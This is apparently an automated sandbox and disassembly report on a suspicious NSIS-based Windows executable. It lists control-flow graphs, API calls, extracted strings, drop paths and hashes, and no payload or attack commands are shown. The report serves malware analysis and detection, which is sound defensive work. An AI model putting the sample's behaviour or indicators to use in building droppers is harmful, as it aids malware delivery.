                                      control_flow_graph 295 40395a-403972 call 406626 298 403974-403984 call 406193 295->298 299 403986-4039bd call 40611a 295->299 308 4039e0-403a09 call 403c30 call 405c25 298->308 304 4039d5-4039db lstrcatW 299->304 305 4039bf-4039d0 call 40611a 299->305 304->308 305->304 313 403a9b-403aa3 call 405c25 308->313 314 403a0f-403a14 308->314 320 403ab1-403ad6 LoadImageW 313->320 321 403aa5-403aac call 40626e 313->321 314->313 316 403a1a-403a42 call 40611a 314->316 316->313 322 403a44-403a48 316->322 324 403b57-403b5f call 40140b 320->324 325 403ad8-403b08 RegisterClassW 320->325 321->320 326 403a5a-403a66 lstrlenW 322->326 327 403a4a-403a57 call 405b4a 322->327 338 403b61-403b64 324->338 339 403b69-403b74 call 403c30 324->339 328 403c26 325->328 329 403b0e-403b52 SystemParametersInfoW CreateWindowExW 325->329 333 403a68-403a76 lstrcmpiW 326->333 334 403a8e-403a96 call 405b1d call 40624c 326->334 327->326 332 403c28-403c2f 328->332 329->324 333->334 337 403a78-403a82 GetFileAttributesW 333->337 334->313 341 403a84-403a86 337->341 342 403a88-403a89 call 405b69 337->342 338->332 348 403b7a-403b94 ShowWindow call 4065b6 339->348 349 403bfd-403bfe call 405383 339->349 341->334 341->342 342->334 354 403ba0-403bb2 GetClassInfoW 348->354 355 403b96-403b9b call 4065b6 348->355 353 403c03-403c05 349->353 356 403c07-403c0d 353->356 357 403c1f-403c21 call 40140b 353->357 360 403bb4-403bc4 GetClassInfoW RegisterClassW 354->360 361 403bca-403bed DialogBoxParamW call 40140b 354->361 355->354 356->338 362 403c13-403c1a call 40140b 356->362 357->328 360->361 366 403bf2-403bfb call 4038aa 361->366 362->338 366->332
                                      APIs
                                        • Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                        • Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                      • lstrcatW.KERNEL32(1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\SDWLLRJcsY.exe",00000000), ref: 004039DB
                                      • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A5B
                                      • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A6E
                                      • GetFileAttributesW.KERNEL32(: Completed), ref: 00403A79
                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea), ref: 00403AC2
                                        • Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0
                                      • RegisterClassW.USER32(004291A0), ref: 00403AFF
                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B17
                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B4C
                                      • ShowWindow.USER32(00000005,00000000), ref: 00403B82
                                      • GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BAE
                                      • GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BBB
                                      • RegisterClassW.USER32(004291A0), ref: 00403BC4
                                      • DialogBoxParamW.USER32(?,00000000,00403D08,00000000), ref: 00403BE3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                      • String ID: "C:\Users\user\Desktop\SDWLLRJcsY.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
                                      • API String ID: 1975747703-2377567919
                                      • Opcode ID: 9009dd5c4e79219ed8b7ac5de4ccd7622ef0cbd3e7ca304b0b87491ac01893d5
                                      • Instruction ID: 49200ef38db144648603e0831490e707cb7affae0874970ced47d7304c9e666f
                                      • Opcode Fuzzy Hash: 9009dd5c4e79219ed8b7ac5de4ccd7622ef0cbd3e7ca304b0b87491ac01893d5
                                      • Instruction Fuzzy Hash: D561B970204601BAE330AF669D49F2B3A7CEB84745F40457FF945B52E2CB7D5912CA2D

                                      Control-flow Graph

                                      control_flow_graph 369 402ec1-402f0f GetTickCount GetModuleFileNameW call 405d3e 372 402f11-402f16 369->372 373 402f1b-402f49 call 40624c call 405b69 call 40624c GetFileSize 369->373 374 4030f3-4030f7 372->374 381 403036-403044 call 402e5d 373->381 382 402f4f 373->382 388 403046-403049 381->388 389 403099-40309e 381->389 384 402f54-402f6b 382->384 386 402f6d 384->386 387 402f6f-402f78 call 4032df 384->387 386->387 394 4030a0-4030a8 call 402e5d 387->394 395 402f7e-402f85 387->395 392 40304b-403063 call 4032f5 call 4032df 388->392 393 40306d-403097 GlobalAlloc call 4032f5 call 4030fa 388->393 389->374 392->389 416 403065-40306b 392->416 393->389 420 4030aa-4030bb 393->420 394->389 398 403001-403005 395->398 399 402f87-402f9b call 405cf9 395->399 406 403007-40300e call 402e5d 398->406 407 40300f-403015 398->407 399->407 418 402f9d-402fa4 399->418 406->407 411 403024-40302e 407->411 412 403017-403021 call 406719 407->412 411->384 419 403034 411->419 412->411 416->389 416->393 418->407 422 402fa6-402fad 418->422 419->381 423 4030c3-4030c8 420->423 424 4030bd 420->424 422->407 425 402faf-402fb6 422->425 426 4030c9-4030cf 423->426 424->423 425->407 427 402fb8-402fbf 425->427 426->426 428 4030d1-4030ec SetFilePointer call 405cf9 426->428 427->407 430 402fc1-402fe1 427->430 431 4030f1 428->431 430->389 432 402fe7-402feb 430->432 431->374 433 402ff3-402ffb 432->433 434 402fed-402ff1 432->434 433->407 435 402ffd-402fff 433->435 434->419 434->433 435->407
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00402ED2
                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SDWLLRJcsY.exe,00000400,?,00000006,00000008,0000000A), ref: 00402EEE
                                        • Part of subcall function 00405D3E: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\SDWLLRJcsY.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                        • Part of subcall function 00405D3E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64
                                      • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SDWLLRJcsY.exe,C:\Users\user\Desktop\SDWLLRJcsY.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                      • String ID: "C:\Users\user\Desktop\SDWLLRJcsY.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SDWLLRJcsY.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                      • API String ID: 4283519449-521245839
                                      • Opcode ID: f1834550daec702275e8430a9050beb8303241b1a1e67c97a0945f4f5965c092
                                      • Instruction ID: c18f197c65803053ad6b90da34fb4f59cecbc903e05eff4d530fc012fb388881
                                      • Opcode Fuzzy Hash: f1834550daec702275e8430a9050beb8303241b1a1e67c97a0945f4f5965c092
                                      • Instruction Fuzzy Hash: 3E51F271A01205AFDB209F65DD85B9E7EA8EB04319F10407BF904B72D5CB788E818BAD

                                      Control-flow Graph

                                      control_flow_graph 436 40626e-406279 437 40627b-40628a 436->437 438 40628c-4062a2 436->438 437->438 439 4062a8-4062b5 438->439 440 4064ba-4064c0 438->440 439->440 441 4062bb-4062c2 439->441 442 4064c6-4064d1 440->442 443 4062c7-4062d4 440->443 441->440 445 4064d3-4064d7 call 40624c 442->445 446 4064dc-4064dd 442->446 443->442 444 4062da-4062e6 443->444 447 4064a7 444->447 448 4062ec-40632a 444->448 445->446 452 4064b5-4064b8 447->452 453 4064a9-4064b3 447->453 450 406330-40633b 448->450 451 40644a-40644e 448->451 454 406354 450->454 455 40633d-406342 450->455 456 406450-406456 451->456 457 406481-406485 451->457 452->440 453->440 463 40635b-406362 454->463 455->454 460 406344-406347 455->460 461 406466-406472 call 40624c 456->461 462 406458-406464 call 406193 456->462 458 406494-4064a5 lstrlenW 457->458 459 406487-40648f call 40626e 457->459 458->440 459->458 460->454 465 406349-40634c 460->465 470 406477-40647d 461->470 462->470 467 406364-406366 463->467 468 406367-406369 463->468 465->454 471 40634e-406352 465->471 467->468 473 4063a4-4063a7 468->473 474 40636b-406389 call 40611a 468->474 470->458 476 40647f 470->476 471->463 477 4063b7-4063ba 473->477 478 4063a9-4063b5 GetSystemDirectoryW 473->478 479 40638e-406392 474->479 480 406442-406448 call 4064e0 476->480 482 406425-406427 477->482 483 4063bc-4063ca GetWindowsDirectoryW 477->483 481 406429-40642d 478->481 484 406432-406435 479->484 485 406398-40639f call 40626e 479->485 480->458 481->480 487 40642f 481->487 482->481 486 4063cc-4063d6 482->486 483->482 484->480 490 406437-40643d lstrcatW 484->490 485->481 492 4063f0-406406 SHGetSpecialFolderLocation 486->492 493 4063d8-4063db 486->493 487->484 490->480 496 406421 492->496 497 406408-40641f SHGetPathFromIDListW CoTaskMemFree 492->497 493->492 495 4063dd-4063e4 493->495 498 4063ec-4063ee 495->498 496->482 497->481 497->496 498->481 498->492
                                      APIs
                                      • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004063AF
                                      • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,004052E7,Completed,00000000), ref: 004063C2
                                      • SHGetSpecialFolderLocation.SHELL32(004052E7,00410EA0,00000000,Completed,?,004052E7,Completed,00000000), ref: 004063FE
                                      • SHGetPathFromIDListW.SHELL32(00410EA0,: Completed), ref: 0040640C
                                      • CoTaskMemFree.OLE32(00410EA0), ref: 00406417
                                      • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 0040643D
                                      • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004052E7,Completed,00000000), ref: 00406495
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                      • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                      • API String ID: 717251189-905382516
                                      • Opcode ID: 5ac7d34cae972a88d7e271cc5c0f960f95d4283ece9e7c17a9ddda12c5cbf51a
                                      • Instruction ID: 1d846ac168704965e63d6b1540e117b92082746421250facdf4000baa2e8fd31
                                      • Opcode Fuzzy Hash: 5ac7d34cae972a88d7e271cc5c0f960f95d4283ece9e7c17a9ddda12c5cbf51a
                                      • Instruction Fuzzy Hash: 8F610E71A00105ABDF249F64CC40AAE37A9EF50314F62813FE943BA2D0D77D49A2C79E

Control-flow Graph

• Function 0040176F-00402ACE (rendered graph omitted; blocks were marked executed / not executed). Internal calls: 00402C37, 00405B94, 0040624C, 00405B1D, 004064E0, 0040658F, 00405D19, 00405D3E, 004052B0, 004030FA, 0040626E, 004058AE. Imports on the graph: lstrcatW, CompareFileTime, SetFileTime, CloseHandle.
                                      APIs
                                      • lstrcatW.KERNEL32(00000000,00000000,Noncyclical,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Hypertragic\Cantilene,?,?,00000031), ref: 004017B0
                                      • CompareFileTime.KERNEL32(-00000014,?,Noncyclical,Noncyclical,00000000,00000000,Noncyclical,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Hypertragic\Cantilene,?,?,00000031), ref: 004017D5
                                        • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
                                        • Part of subcall function 004052B0: lstrlenW.KERNEL32(Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                        • Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                        • Part of subcall function 004052B0: lstrcatW.KERNEL32(Completed,00403233,00403233,Completed,00000000,00410EA0,00403094), ref: 0040530B
                                        • Part of subcall function 004052B0: SetWindowTextW.USER32(Completed,Completed), ref: 0040531D
                                        • Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                        • Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                        • Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                      • String ID: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Hypertragic\Cantilene$C:\Windows\Intragantes.geo$Noncyclical$sarcoderma
                                      • API String ID: 1941528284-1591310664
                                      • Opcode ID: 3a324719c85a337398cc65979c64fae98dea917b83dd153e176ff01d71b6075b
                                      • Instruction ID: a770c97b6a534c03b62b220807ae8b4c56d0338f794e1485d955ae8f7948b73c
                                      • Opcode Fuzzy Hash: 3a324719c85a337398cc65979c64fae98dea917b83dd153e176ff01d71b6075b
                                      • Instruction Fuzzy Hash: 69419331900519BECF117BB5CD45DAF3A79EF45329B20827FF412B11E2CA3C8A619A6D

Control-flow Graph

• Function 004052B0-00405380 (rendered graph omitted; blocks were marked executed / not executed). Internal call: 0040626E. Imports on the graph: lstrlenW, lstrcatW, SetWindowTextW, SendMessageW (three call sites).
                                      APIs
                                      • lstrlenW.KERNEL32(Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                      • lstrlenW.KERNEL32(00403233,Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                      • lstrcatW.KERNEL32(Completed,00403233,00403233,Completed,00000000,00410EA0,00403094), ref: 0040530B
                                      • SetWindowTextW.USER32(Completed,Completed), ref: 0040531D
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                      • String ID: Completed
                                      • API String ID: 2531174081-3087654605
                                      • Opcode ID: 59d154118c10e025c7735e233b98b544c2589afa460e0b5fca85982ca0aab28e
                                      • Instruction ID: a4acd4142143b7f1d9b449385db23515f6e2bed73a3e7c1e364118513a645948
                                      • Opcode Fuzzy Hash: 59d154118c10e025c7735e233b98b544c2589afa460e0b5fca85982ca0aab28e
                                      • Instruction Fuzzy Hash: 09216071900518BACB21AF66DD84DDFBF74EF45350F14807AF944B62A0C7794A51CF68

Control-flow Graph

• Function 004065B6-00406623 (rendered graph omitted; blocks were marked executed / not executed). No internal calls. Imports on the graph: GetSystemDirectoryW, wsprintfW, LoadLibraryExW.
                                      APIs
                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065CD
                                      • wsprintfW.USER32 ref: 00406608
                                      • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040661C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                      • String ID: %s%S.dll$UXTHEME$\
                                      • API String ID: 2200240437-1946221925
                                      • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                      • Instruction ID: f2f916ca2f11fba704df1b43a3ace0cea71321b702594bff0db05fa861777559
                                      • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                      • Instruction Fuzzy Hash: F9F0F670500219BBCF24AB68ED0DF9B3B6CAB00704F50447AA646F10D1EB78DA24CBA8

Control-flow Graph

• Function 004030FA-004032DC (rendered graph omitted; blocks were marked executed / not executed). Internal calls: 004032F5, 004032DF, 00406787, 004067A7, 00405DF0, 004052B0. Imports on the graph: GetTickCount, MulDiv, wsprintfW.
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: CountTick$wsprintf
                                      • String ID: ... %d%%
                                      • API String ID: 551687249-2449383134
                                      • Opcode ID: ec08b81ccf01a23b3f2095c025c940c6288906fc183749b0f6cb8fc1ea750618
                                      • Instruction ID: 2f3e22fda6cf622f8bf4b8160786ddb998526db62ce5623fe0a3028d3f0862ac
                                      • Opcode Fuzzy Hash: ec08b81ccf01a23b3f2095c025c940c6288906fc183749b0f6cb8fc1ea750618
                                      • Instruction Fuzzy Hash: A3517171900219EBCB10DF65DA48B9F3B68AF45366F1441BFF805B72C0D7789E508BA9

Control-flow Graph

• Function 0040577F-004057F9 (rendered graph omitted; blocks were marked executed / not executed). No internal calls. Imports on the graph: CreateDirectoryW, GetLastError, SetFileSecurityW.
                                      APIs
                                      • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057C2
                                      • GetLastError.KERNEL32 ref: 004057D6
                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004057EB
                                      • GetLastError.KERNEL32 ref: 004057F5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                      • String ID: C:\Users\user\Desktop
                                      • API String ID: 3449924974-224404859
                                      • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                      • Instruction ID: a96db4d766433405fa600e453148f039d13b259e3fca1cfbe784ddd29ae139cf
                                      • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
